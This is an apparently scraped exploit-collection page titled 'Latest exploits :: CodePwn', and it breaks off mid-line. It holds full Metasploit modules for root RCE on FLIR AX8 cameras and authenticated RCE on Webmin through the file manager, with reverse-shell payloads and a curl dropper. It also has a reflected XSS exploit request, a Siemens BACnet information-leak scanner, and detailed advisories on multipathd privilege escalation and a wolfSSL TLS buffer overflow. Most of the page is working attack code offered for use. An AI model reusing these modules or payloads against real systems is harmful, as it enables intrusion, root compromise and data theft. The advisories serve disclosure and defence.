Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/stopwatch' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'FLIR AX8 unauthenticated RCE', 'Description' => %q{ All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. This module uses the vulnerability to upload and execute payloads gaining root privileges. }, 'License' => MSF_LICENSE, 'Author' => [ 'Thomas Knudsen (https://www.linkedin.com/in/thomasjknudsen)', # Security researcher 'Samy Younsi (https://www.linkedin.com/in/samy-younsi)', # Security researcher 'h00die-gr3y' # metasploit module ], 'References' => [ ['CVE', '2022-37061'], ['PACKETSTORM', '168114'], ['URL', 'https://attackerkb.com/topics/UAZaDsQBfx/cve-2022-37061'], ], 'DisclosureDate' => '2022-08-19', 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_ARMLE], 'Privileged' => true, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_ARMLE], 'Type' => :linux_dropper, 'CmdStagerFlavor' => [ 'curl', 'printf' ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 80, 'SSL' => false }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) end def execute_command(cmd, _opts = {}) action_id = rand(1..40) return send_request_cgi({ 'method' => 'POST', 'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8', 'uri' => normalize_uri(target_uri.path, 'res.php'), 'vars_post' => { 'action' => 'alarm', 'id' => "#{action_id};#{cmd}" } }) rescue StandardError => e elog("#{peer} - Communication error occurred: #{e.message}", error: e) print_error("Communication error occurred: #{e.message}") return nil end # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution def check print_status("Checking if #{peer} can be exploited!") sleep_time = rand(5..10) print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.") res, elapsed_time = Rex::Stopwatch.elapsed_time do execute_command("sleep #{sleep_time}") end return Exploit::CheckCode::Unknown('No response received from the target!') unless res print_status("Elapsed time: #{elapsed_time} seconds.") return CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time CheckCode::Vulnerable('Successfully tested command injection.') end def exploit case target['Type'] when :unix_cmd print_status("Executing #{target.name} with #{payload.encoded}") execute_command(payload.encoded) when :linux_dropper print_status("Executing #{target.name}") execute_cmdstager end end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Webmin prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Webmin File Manager RCE', 'Description' => %q{ In Webmin version 1.984, any authenticated low privilege user without access rights to the File Manager module could interact with file manager functionalities such as downloading files from remote URLs and changing file permissions. It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those functionalities in the file manager. }, 'Author' => [ 'faisalfs10x', # discovery 'jheysel-r7' # module ], 'References' => [ [ 'URL', 'https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/'], # exploit [ 'URL', 'https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell'], # exploit [ 'CVE', '2022-0824'] ], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Privileged' => true, 'Targets' => [ [ 'Automatic (Unix In-Memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' } } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2022-02-26', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ OptPort.new('RPORT', [true, 'The default webmin port', 10000]), OptString.new('USERNAME', [ true, 'The username to authenticate as', '' ]), OptString.new('PASSWORD', [ true, 'The password for the specified username', '' ]) ] ) end def check webmin_check('0', '1.984') end def login webmin_login(datastore['USERNAME'], datastore['PASSWORD']) end def download_remote_url print_status('Fetching payload from HTTP server') res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], '/extensions/file-manager/http_download.cgi'), 'method' => 'POST', 'keep_cookies' => true, 'data' => 'link=' + get_uri + '.cgi' + '&username=&password=&path=%2Fusr%2Fshare%2Fwebmin', 'headers' => { 'Accept' => 'application/json, text/javascript, */*; q=0.01', 'Accept-Encoding' => 'gzip, deflate', 'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '/filemin/?xnavigation=1' }, 'vars_get' => { 'module' => 'filemin' } }) fail_with(Failure::UnexpectedReply, 'Unable to download .cgi payload from http server') unless res fail_with(Failure::BadConfig, 'please properly configure the http server, it could not be found by webmin') if res.body.include?('Error: No valid URL supplied!') register_file_for_cleanup("/usr/share/webmin/#{@file_name}") end def modify_permissions print_status('Modifying the permissions of the uploaded payload to 0755') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/extensions/file-manager/chmod.cgi'), 'method' => 'POST', 'keep_cookies' => true, 'headers' => { 'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + 'filemin/?xnavigation=1' }, 'vars_get' => { 'module' => 'filemin', 'page' => '1', 'paginate' => '30' }, 'vars_post' => { 'name' => @file_name, 'perms' => '0755', 'applyto' => '1', 'path' => '/usr/share/webmin' } }) fail_with(Failure::UnexpectedReply, 'Unable to modify permissions on the upload .cgi payload') unless res && res.code == 302 end def exec_revshell res = send_request_cgi( 'method' => 'GET', 'keep_cookies' => true, 'uri' => normalize_uri(datastore['TARGETURI'], @file_name), 'headers' => { 'Connection' => 'keep-alive' } ) fail_with(Failure::UnexpectedReply, 'Unable to execute the .cgi payload') unless res && res.code == 500 end def on_request_uri(cli, request) print_status("Request '#{request.method} #{request.uri}'") print_status('Sending payload ...') send_response(cli, payload.encoded, 'Content-Type' => 'application/octet-stream') end def exploit start_service @file_name = (get_resource.gsub('/', '') + '.cgi') cookie = login fail_with(Failure::BadConfig, 'Unsuccessful login attempt with creds') if cookie.empty? print_status('Downloading remote url') download_remote_url print_status('Finished downloading remote url') modify_permissions exec_revshell end end </code></pre>

<pre><code>## Title: Ecommerce-CodeIgniter-Bootstrap-1.0 Cross-site scripting (reflected) RCE ## Author: nu11secur1ty ## Date: 10.29.2022 ## Vendor: https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap ## Software: https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/archive/refs/heads/master.zip ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap ## Description: The value of the search_in_title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5iun"><script>alert(1)</script>h4s83 was submitted in the search_in_title parameter. The malicious user can use this vulnerability to exploit every user of this system to make them a bot machine and etc. [+] Exploit: ```POST GET /Ecommerce-CodeIgniter-Bootstrap-master/bg?category=&in_stock=&search_in_title=f5iun"><a%20href="https://pornhub.com/"%20target="_blank"%20rel="noopener%20nofollow%20ugc">%20<img%20src="https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif??token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1"%20style="border:1px%20solid%20black;max-width:100%;"%20alt="Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!">%20</a>h4s83&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592 HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: ci_session=vndq7brjjjf1an7k6s3q913bsqjf03it Upgrade-Insecure-Requests: 1 Referer: http://pwnedhost.com/Ecommerce-CodeIgniter-Bootstrap-master/bg?category=&in_stock=&search_in_title=&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 0 ``` # Proof and Exploit: [href](https://streamable.com/y3q67i) </code></pre>

<pre><code> Qualys Security Advisory Leeloo Multipath: Authorization bypass and symlink attack in multipathd (CVE-2022-41974 and CVE-2022-41973) ======================================================================== Contents ======================================================================== Summary CVE-2022-41974: Authorization bypass CVE-2022-41973: Symlink attack Acknowledgments Timeline ======================================================================== Summary ======================================================================== We discovered two local vulnerabilities (an authorization bypass and a symlink attack) in multipathd, a daemon that is running as root in the default installation of (for example) Ubuntu Server: https://ubuntu.com/server/docs/device-mapper-multipathing-introduction https://github.com/opensvc/multipath-tools We combined these two vulnerabilities with a third vulnerability, in another package that is also installed by default on Ubuntu Server, and obtained full root privileges on Ubuntu Server 22.04; other releases are probably also exploitable. We will publish this third vulnerability, and the complete details of this local privilege escalation, in an upcoming advisory. The authorization bypass (CVE-2022-41974) was introduced in February 2017 (version 0.7.0) by commit 9acda0c ("Perform socket client uid check on IPC commands"), but earlier versions perform no authorization checks at all: any unprivileged local user can issue any privileged command to multipathd. The symlink attack (CVE-2022-41973) was introduced in May 2018 (version 0.7.7) by commit 65d0a63 ("functions to indicate mapping failure in /dev/shm"); the vulnerable code was hardened significantly in May 2020 (version 0.8.5) by commit 40ee3ea ("simplify failed wwid code"), but it remains exploitable nonetheless. ======================================================================== CVE-2022-41974: Authorization bypass ======================================================================== The multipathd daemon listens for client connections on an abstract Unix socket (conveniently, the multipathd binary itself can act as a client, if executed with non-option arguments; we use this feature extensively in this advisory to connect and send commands to the multipathd daemon): ------------------------------------------------------------------------ $ ps -ef | grep 'multipath[d]' root 377 1 0 13:55 ? 00:00:00 /sbin/multipathd -d -s $ ss -l -x | grep 'multipathd' u_str LISTEN 0 4096 @/org/kernel/linux/storage/multipathd 18105 ------------------------------------------------------------------------ The commands sent by a client to multipathd are composed of keywords, and internally, each keyword is identified by a different bit; for example, "list" is 1 (1<<0), "add" is 2 (1<<1), and "path" (which requires a parameter) is 65536 (1<<16): ------------------------------------------------------------------------ 155 load_keys (void) ... 163 r += add_key(keys, "list", LIST, 0); 164 r += add_key(keys, "show", LIST, 0); 165 r += add_key(keys, "add", ADD, 0); ... 183 r += add_key(keys, "path", PATH, 1); ------------------------------------------------------------------------ 53 #define LIST (1ULL << __LIST) 54 #define ADD (1ULL << __ADD) .. 69 #define PATH (1ULL << __PATH) ------------------------------------------------------------------------ 6 enum { 7 __LIST, /* 0 */ 8 __ADD, .. 23 __PATH, ------------------------------------------------------------------------ In turn, each command is associated with a handler (a C function) by its fingerprint -- the bitwise OR of its constituent keywords; for example, the command "list path PARAM" is associated with cli_list_path() by the fingerprint 65537 (LIST+PATH=1+65536), and the command "add path PARAM" is associated with cli_add_path() by the fingerprint 65538 (ADD+PATH=2+65536): ------------------------------------------------------------------------ 1522 void init_handler_callbacks(void) .... 1527 set_handler_callback(LIST+PATH, cli_list_path); .... 1549 set_handler_callback(ADD+PATH, cli_add_path); ------------------------------------------------------------------------ 321 static uint64_t 322 fingerprint(const struct _vector *vec) ... 325 uint64_t fp = 0; ... 331 vector_foreach_slot(vec, kw, i) 332 fp += kw->code; 333 334 return fp; ------------------------------------------------------------------------ 89 static struct handler * 90 find_handler (uint64_t fp) .. 95 vector_foreach_slot (handlers, h, i) 96 if (h->fingerprint == fp) 97 return h; 98 99 return NULL; ------------------------------------------------------------------------ When multipathd receives a command from a client, it first performs an authentication check and an authorization check (both at line 491): ------------------------------------------------------------------------ 431 static int client_state_machine(struct client *c, struct vectors *vecs, ... 485 case CLT_PARSE: 486 c->error = parse_cmd(c); 487 if (!c->error) { ... 491 if (!c->is_root && kw->code != LIST) { 492 c->error = -EPERM; ... 495 } 496 } 497 if (c->error) ... 501 else 502 set_client_state(c, CLT_WORK); ... 522 case CLT_WORK: 523 c->error = execute_handler(c, vecs); ------------------------------------------------------------------------ - Authentication: if the client's UID (obtained from SO_PEERCRED) is 0 (i.e., if is_root is true), then the client is privileged; otherwise, it is unprivileged. - Authorization: if the client is privileged, it is allowed to execute any commands; otherwise, only unprivileged LIST commands are allowed (i.e., commands whose first keyword is either "list" or "show"). Attentive readers may have noticed that multipathd does not, in fact, calculate the fingerprint of a command by bitwise-ORing its constituent keywords, but by arithmetic-ADDing them (at line 332). While these two operations are equivalent if no keyword is repeated, we (attackers) can send a seemingly unprivileged command (whose first keyword is "list") but whose fingerprint matches a privileged command (by repeating the "list" keyword): we can exploit this flaw to bypass multipathd's authorization check. For example, we are not allowed to execute "add path PARAM" (whose fingerprint is 2+65536=65538) because the first keyword is not "list", but we are allowed to execute the equivalent "list list path PARAM" (whose fingerprint is also 1+1+65536=65538, instead of 1|1|65536=65537) because the first keyword is "list" (the multipathd daemon below replies "blacklisted" because PARAM is an invalid path, not because the command is denied): ------------------------------------------------------------------------ $ multipathd add path PARAM permission deny: need to be root $ multipathd list list path PARAM blacklisted ------------------------------------------------------------------------ This authorization bypass greatly enlarges the attack surface of multipathd: 34 privileged command handlers become available to local attackers, in addition to the 23 unprivileged command handlers that are normally available. We audited only a few of these command handlers, because we quickly discovered a low-hanging vulnerability (a symlink attack) in one of them. ======================================================================== CVE-2022-41973: Symlink attack ======================================================================== multipathd operates insecurely, as root, in /dev/shm (a sticky, world-writable directory similar to /tmp). The vulnerable code (in mark_failed_wwid()) may be executed during the normal lifetime of multipathd, but a local attacker can force its execution by exploiting the authorization bypass CVE-2022-41974; for example, by adding a "whitelisted, unmonitored" device to multipathd: ------------------------------------------------------------------------ $ multipathd list devices | grep 'whitelisted, unmonitored' sda1 devnode whitelisted, unmonitored ... $ multipathd list list path sda1 fail ------------------------------------------------------------------------ This command, which is equivalent to "add path sda1", results in the following system-call trace (strace) of the multipathd daemon: ------------------------------------------------------------------------ 386 openat(AT_FDCWD, "/dev/shm/multipath/failed_wwids", O_RDONLY|O_DIRECTORY) = -1 ENOENT (No such file or directory) 387 mkdir("/dev", 0700) = -1 EEXIST (File exists) 388 mkdir("/dev/shm", 0700) = -1 EEXIST (File exists) 389 mkdir("/dev/shm/multipath", 0700) = 0 390 mkdir("/dev/shm/multipath/failed_wwids", 0700) = 0 391 openat(AT_FDCWD, "/dev/shm/multipath/failed_wwids", O_RDONLY|O_DIRECTORY) = 12 392 getpid() = 375 393 openat(12, "VBOX_HARDDISK_VB60265ca5-df119cb6.177", O_RDONLY|O_CREAT|O_EXCL, 0400) = 13 394 close(13) = 0 395 linkat(12, "VBOX_HARDDISK_VB60265ca5-df119cb6.177", 12, "VBOX_HARDDISK_VB60265ca5-df119cb6", 0) = 0 396 unlinkat(12, "VBOX_HARDDISK_VB60265ca5-df119cb6.177", 0) = 0 397 close(12) = 0 ------------------------------------------------------------------------ - at line 389, the directory "/dev/shm/multipath" is created, if it does not exist already; - at line 390, the directory "/dev/shm/multipath/failed_wwids" is created, if it does not exist already; - at lines 391-397, the empty file "/dev/shm/multipath/failed_wwids/VBOX_HARDDISK_VB60265ca5-df119cb6" is created, if it does not exist already (its name is the "World Wide ID" of the added device). multipathd is therefore vulnerable to two different symlink attacks: 1/ if we (attackers) create an arbitrary symlink "/dev/shm/multipath", then we can create a directory named "failed_wwids" (user root, group root, mode 0700) anywhere in the filesystem; 2/ if we create an arbitrary symlink "/dev/shm/multipath/failed_wwids", then we can create a file named "VBOX_HARDDISK_VB60265ca5-df119cb6" (user root, group root, mode 0400, size 0) anywhere in the filesystem. These two symlink attacks are very weak, because we do not control the name, user, group, mode, or contents of the directory or file that we create; only its location. Despite these limitations, we were able to combine multipathd's vulnerabilities (authorization bypass and symlink attack) with a third vulnerability (in another package), and obtained full root privileges on Ubuntu Server 22.04; we will publish this third vulnerability in an upcoming advisory. Side note: initially, we thought that the symlink attack 1/ would fail, because /dev/shm is a sticky world-writable directory, and the kernel's fs.protected_symlinks is 1 by default; to our great surprise, however, it succeeded. Eventually, we understood that only the final component of a path is protected, not its intermediate components; for example, if /tmp/foo is a symlink, then an access to /tmp/foo itself is protected, but an access to /tmp/foo/bar is not. Interestingly, this weakness was already pointed out in 2017 by Solar Designer, and the original Openwall, grsecurity, and Yama protections are not affected: https://www.openwall.com/lists/kernel-hardening/2017/06/06/74 ======================================================================== Acknowledgments ======================================================================== We thank Martin Wilck and Benjamin Marzinski for their hard work on this release, and the SUSE Security Team for their help with this disclosure. We also thank the members of linux-distros@openwall. ======================================================================== Timeline ======================================================================== 2022-08-24: Advisory sent to security@suse. 2022-10-10: Advisory and patches sent to linux-distros@openwall. 2022-10-24: Coordinated Release Date (15:00 UTC). </code></pre>

<pre><code># wolfssl before 5.5.1: CVE-2022-39173 Buffer overflow when refining cipher suites ================================================================================== ## INFO ======= The CVE project has assigned the id CVE-2022-39173 to this issue. Severity: high 7.5 Affected version: before 5.5.1 End of embargo: The embargo for this vulnerability ended 29th of September, 2022 ## SUMMARY ========== In wolfSSL before 5.5.1 malicious clients can cause a buffer-overflow during a resumed TLS 1.3 handshake. If an attacker resumes a previous TLS session by sending a maliciously crafted Client Hello, followed by another maliciously crafted Client Hello. In total 2 Client Hellos have to be sent. One which pretends to resume a previous session and a second one as a response to a Hello Retry Request message. The malicious Client Hellos contain a list of supported cipher suites, which contain at least `⌊sqrt(150)⌋ + 1 = 13` duplicates and less than 150 ciphers in total. The buffer-overflow occurs in the `RefineSuites` function. An overflow of 44700 bytes has been confirmed. Therefore, large portions of the stack can get overwritten, including return addresses. We confirmed the vulnerability by sending packets over TCP to a Wolfssl server, freshly built from the sources with the `--enable-session-ticket` flags (or simply `--enable-all`). We can provide sources for our software (tlspuffin) that produce those packets (and that automatically found the attack trace). The command given at the end of this document triggers the buffer overflow. It is very likely that there is a way to craft an exploit which can cause a RCE. We have not yet created such an exploit as it would likely depend on the memory layout of the binary which uses wolfSSL. Moreover, the size of the overflow can be fine-tuned in order to not smash the stack and continue the execution with a too large length of suites buffer and that will cause other routines that iterate over thus buffer (e.g., `FindSuiteSSL`) to misbehave. Hypothetically, this might be exploited to make the server use a cipher it should not accept such as `nullcipher` that would open up new attack vectors such as downgrade attacks. While this has not been confirmed yet, the buffer overflow itself has been confirmed. ## DETAILS ========== Line numbers below are valid for the wolfSSL Git tag [v5.4.0-stable](https://github.com/wolfSSL/wolfssl/tree/v5.4.0-stable). The bug we found is in the `RefineSuites` function. In the following we want to explain why the function is able to overflow the `suites` array. ```c /* Refine list of supported cipher suites to those common to server and client. * * ssl SSL/TLS object. * peerSuites The peer's advertised list of supported cipher suites. */ static void RefineSuites(WOLFSSL* ssl, Suites* peerSuites) { byte suites[WOLFSSL_MAX_SUITE_SZ]; word16 suiteSz = 0; word16 i, j; XMEMSET(suites, 0, WOLFSSL_MAX_SUITE_SZ); for (i = 0; i < ssl->suites->suiteSz; i += 2) { for (j = 0; j < peerSuites->suiteSz; j += 2) { if (ssl->suites->suites[i+0] == peerSuites->suites[j+0] && ssl->suites->suites[i+1] == peerSuites->suites[j+1]) { suites[suiteSz++] = peerSuites->suites[j+0]; suites[suiteSz++] = peerSuites->suites[j+1]; } } } ssl->suites->suiteSz = suiteSz; XMEMCPY(ssl->suites->suites, &suites, sizeof(suites)); #ifdef WOLFSSL_DEBUG_TLS [...] #endif } ``` tls13.c:4355 The `RefineSuites` function expects a `WOLFSSL` struct which contains a list of acceptable ciphers suites (`ssl->suites->suites`), as well as an array of peer cipher suites (`peerSuites`). Both inputs are bounded by `WOLFSSL_MAX_SUITE_SZ`, which is equal to 300 bytes or 150 cipher suites. Let us assume that `ssl->suites` consists of a single cipher suite like `TLS_AES_256_GCM_SHA384` and the `peerSuites` list contains the same cipher repeated thirteen times. The `RefineSuites` function will iterate for each element in `ssl->suites` over `peerSuites` and append the suite to `suites` if it is a match. The `suites` array has a maximum length of `WOLFSSL_MAX_SUITE_SZ == 300 bytes == 150 suites`. With the just mentioned example input, the length of `suites` will now equal thirteen. The `suites` array is now copied to the `WOLFSSL` struct in the last line of the listing above. Therefore, `ssl->suites` contains now thirteen times the `TLS_AES_256_GCM_SHA384` cipher suite. Let us now call the same `RefineSuites` function again on the modified `WOLFSSL` struct and the same `peerSuites` list. The `RefineSuites` function will iterate for each element in `ssl->suites` over `peerSuites` and append the suite to `suites` if it is a match. Because `ssl->suites` contains already 13 times the `TLS_AES_256_GCM_SHA384` cipher suite, in total 13 x 13 = 169 cipher suites are written to `suites`. 169 cipher suites require 338 bytes, which is more than what's available on the stack. The `suites` buffer overflows. The maximum size of `peerSuites` is 150 cipher suites. Therefore, an overflow of 44700 bytes is possible and has been confirmed. The buffer `ssl->suites->suites` is supposed to be reset to only contain the acceptable ciphers at each session start, and thus initially contains no duplicate. However, by provoking a `HELLO CLIENT RETRY REQUEST`, it is possible to make the server call `RefineSuites` twice as explained next. ## TRIGGERING THE BUFFER OVERFLOW ================================= In order to cause the above buffer-overflow, it is required to call `RefineSuites` twice. Malicious clients need to perform the handshake in a certain way to reach this situation. The buffer overflow at the attacked server can be obtained at least in the following situation: 1. Resume the previous session by sending a second Client Hello (`CH2`) with the following criteria: - Exclude the `support_group_extension`, to cause a Hello Retry Request - Include a binder which cryptographically binds this session to the previous one. - Include a list of cipher suites that contains a repetition of `n` times the same cipher `c` with `13 <= n < 150`, deemed acceptable by the server. The server will parse this message, enters the state `SERVER_HELLO_RETRY_REQUEST_COMPLETE` and stores at least `n` times the cipher `c` in `ssl->suites->suites` by calling `RefineSuites`. 2. Sending a third Client Hello (`CH3`) with the same criteria as in step 2. The server will parse this message and because `ssl->suites->suites` already contains `n` times the cipher `c`, `RefineSuites` will write in `suites` at least until `suites[nˆ2]` which overflows since `nˆ2 > 300`. ## DETAILS ABOUT STEP 1. ======================== During step 2., we want to cause the server to perform a Hello Retry Request. This is possible by not sending a supported group in the `CH2`. By not sending a support group extension, the function `TLSX_SupportedGroups_Find` will return false. ```c static int TLSX_SupportedGroups_Find(WOLFSSL* ssl, word16 name) { ... /* Check consistency now - extensions in any order. */ if (!TLSX_SupportedGroups_Find(ssl, clientKSE->group)) continue; ... ``` tls.c:8374 This will cause clientKSE to be `NULL` and `doHelloRetry` will be set to 1. ```c int TLSX_KeyShare_Establish(WOLFSSL *ssl, int* doHelloRetry) { ... /* No supported group found - send HelloRetryRequest. */ if (clientKSE == NULL) { /* Set KEY_SHARE_ERROR to indicate HelloRetryRequest required. */ *doHelloRetry = 1; return TLSX_KeyShare_SetSupported(ssl); } ... ``` tls.c:9273 Finally, the server enters the state `SERVER_HELLO_RETRY_REQUEST_COMPLETE` in the function `VerifyServerSuite` while verifying the server suite when processing `CH2`. ```c /* Make sure server cert/key are valid for this suite, true on success * Returns 1 for valid server suite or 0 if not found * For asynchronous this can return WC_PENDING_E */ static int VerifyServerSuite(WOLFSSL* ssl, word16 idx) { ... if (IsAtLeastTLSv1_3(ssl->version) && ssl->options.side == WOLFSSL_SERVER_END) { int doHelloRetry = 0; /* Try to establish a key share. */ int ret = TLSX_KeyShare_Establish(ssl, &doHelloRetry); if (doHelloRetry) { ssl->options.serverState = SERVER_HELLO_RETRY_REQUEST_COMPLETE; } ... } ... ``` tls.c:30688 ## DETAILS ABOUT STEP 2. ==================== The server is now in a state in which it expects another Client Hello (`CH3`) from the client. The server is now in the state `SERVER_HELLO_RETRY_REQUEST_COMPLETE` and will process the third ClientHello (`CH3`) with the call of `ProcessReply` before reaching the `TLS13_ACCEPT_SECOND_REPLY_DONE` state. ```c int wolfSSL_accept_TLSv13(WOLFSSL* ssl) { ... case TLS13_ACCEPT_FIRST_REPLY_DONE : if (ssl->options.serverState == SERVER_HELLO_RETRY_REQUEST_COMPLETE) { ssl->options.clientState = CLIENT_HELLO_RETRY; while (ssl->options.clientState < CLIENT_HELLO_COMPLETE) { if ((ssl->error = ProcessReply(ssl)) < 0) { WOLFSSL_ERROR(ssl->error); return WOLFSSL_FATAL_ERROR; } } } ssl->options.acceptState = TLS13_ACCEPT_SECOND_REPLY_DONE; WOLFSSL_MSG("accept state ACCEPT_SECOND_REPLY_DONE"); FALL_THROUGH; ... ``` tls13.c:10909 ## VULNERABILITY VARIANTS ========================= ### Adjusting the overflow Note that the length of the list of ciphers in `CH2` does not necessarily have to be the same as the one of `CH1` and can be adjusted to fine-tune the size of the overflow. ### Make the server parse `CH2` Note also that, on the contrary to `CH1`, `CH2` does not necessarily have to put the server in the `SERVER_HELLO_RETRY_REQUEST_COMPLETE` state (which should be forbidden by the TLS 1.3 RFC) or make it return an error, and can thus contain a supported group, which could be included to possibly make the server continue the processing of `CH2` without returning an error. We have confirmed that we can make the server parses `CH2` until the end and starts computing a Server Hello with `ssl->suites->suiteSz` that exceeds 300. ### Resuming an existent session It is also possible to trigger the vulnerability by trying to resume an existent and genuine session established through a full initial handshake (step 0.): 0. Sending an initial genuine Client Hello (`CH1`) to the server and then completing a full handshake, thus establishing a PSK. ## EXPLOITATION =============== We suspect that it is possible to craft an exploit which could lead to RCE if any of the above bytes coincides with the memory address of executable code. Depending on the memory layout of the binary it could be possible to gain RCE. More bytes could be used to overflow `suites` if more ciphers were configured to be accepted with the server, e.g., with options like `--enable-blake2`. We confirmed that this could also be exploited to smash the stack and cause the server to crash with a segmentation fault by using a large list of ciphers. Finally, by fine-tuning the length of the overflow and by including the supported group in `CH3`, it could be possible to make the server process `CH3` with a `ssl->suites->suites->suiteSz` value that exceeds 300. This way, routines like `FindSuiteSSL` that will iterate over `ssl->suites->suites` (allocated on 300 bytes) until `ssl->suites->suiteSz` (>300) will also iterate over bytes that contain other fields such as `ssl->suites->hashSigAlgo`. It is likely that this could be exploited to make such routines return arbitrary values. For example, it might be exploited to make the server use a cipher it should not accept such as `nullcipher`; thus breaking confidentiality. ## FURTHER CONCERNS ================== We observed that the server is accepting the `CH2` Client Hello message and issues a Hello Retry Request, even though `CH2` does not contain supported groups. Clients are not allowed to add the supported groups extension in the retry Client Hello (`CH3`) according to the RFC 8446 in section [4.1.2](https://www.rfc-editor.org/rfc/rfc8446#section-4.1.2). The addition of supported groups is not allowed when retrying the Client Hello. We suggest aborting the handshake when receiving `CH2` instead of offering the client a retry. </code></pre>

<pre><code>#!/usr/bin/env python3 # -*- coding: utf-8 -*- # 2022-05-23 # Standard Modules from metasploit import module # Extra Dependencies dependencies_missing = False try: import logging import requests import requests import xmltodict import xml.etree.ElementTree as ET import socket import struct import requests except ImportError: dependencies_missing = True # Metasploit Metadata metadata = { 'name': 'Siemens BACnet Field Panel Path Traversal', 'description': ''' This module exploits a hidden directory on Siemens APOGEE PXC BACnet Automation Controllers (all versions prior to V3.5), and TALON TC BACnet Automation Controllers (all versions prior to V3.5). With a 7.5 CVSS, this exploit allows for an attacker to perform an authentication bypass using an alternate path or channel to enumerate hidden directories in the web server. ''', 'authors': [ 'RoseSecurity', ], 'date': '2022-05-23', 'license': 'MSF_LICENSE', 'references': [ {'type': 'url', 'ref': 'https://sid.siemens.com/v/u/A6V10304985'}, {'type': 'cve', 'ref': 'https://nvd.nist.gov/vuln/detail/CVE-2017-9946'}, ], 'type': 'single_scanner', 'options': { 'rhost': {'type': 'string', 'description': 'Target address', 'required': True, 'default': None}, } } def run(args): module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost'])) if dependencies_missing: logging.error('Module dependency (requests) is missing, cannot continue') return try: # Download Hidden XML File r = requests.get('http://{}/{}'.format(args['rhost'], '/FieldPanel.xml'), verify=False) # Convert to Readable Format xml_doc = r.content root = ET.fromstring(xml_doc) # Parse XML for Sensitive Data module.log("Remote Site ID: " + root[18].text) module.log("Building Level Network Name: " + root[26].text) module.log("Site Name: " + root[27].text) module.log("Hostname: " + root[28].text) ip_addr = int(root[30].text, 16) module.log("IP Address: " + socket.inet_ntoa(struct.pack(">L", ip_addr))) gw_addr = int(root[32].text, 16) gw_addr = str(socket.inet_ntoa(struct.pack(">L", gw_addr))) module.log("Gateway IP Address: " + gw_addr[::-1]) module.log("Maximum Transmission Size: " + root[57].text) module.log("BACnet Device Name: " + root[60].text) module.log("BACnet UDP Port: " + root[62].text) module.log("Device Location: " + root[63].text) module.log("Device Description: " + root[64].text) module.log("Device 